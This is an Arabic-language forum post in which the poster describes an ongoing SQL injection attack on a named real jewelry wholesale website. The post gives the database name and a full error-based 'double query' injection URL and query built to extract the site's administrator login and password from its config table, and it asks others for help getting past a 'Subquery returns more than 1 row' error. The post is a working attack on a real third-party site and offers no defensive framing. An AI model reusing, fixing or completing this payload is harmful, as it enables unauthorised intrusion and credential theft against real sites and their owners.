السلام عليكم ورحمة الله وبركاته
إخواني بحقن موقع دبل كيري وهذا رابط الثغرة
http://www.wholesale-indian-silver-j...view.php?id=74
القاعدة wisj_db_com
طيب انا استخرجت الجداول يلي بالقاعدة وبأحد الجداول يلي هو:
tbl_site_config
لقيت هذه الأعمدة:
'site_admin_login_id' 'site_admin_password'
تمام
عند الاستخراج بيظهر خطأ بيجنني !!
 | اقتباس |  | | | | | | | | | | Cannot Run the Query:
select * from tbl_products where products_categories_id=74 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7e) FROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1-- - order by products_id
as following error is encountered...
| |  | |  | |
| | اقتباس | | | | | | | | | | |
Subquery returns more than 1 row
| | | | | | |
مع العلم هذا هو رابط الاستغلال يلي عم احقن فيه:
http://www.wholesale-indian-silver-jewelry.com/cat_view.php?id=74 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7e) FROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--
أرجوكم مساعدة لو سمحتم...
ومشكورين سلفاً
la;gm fhgprk !! g, slpjl lshu]m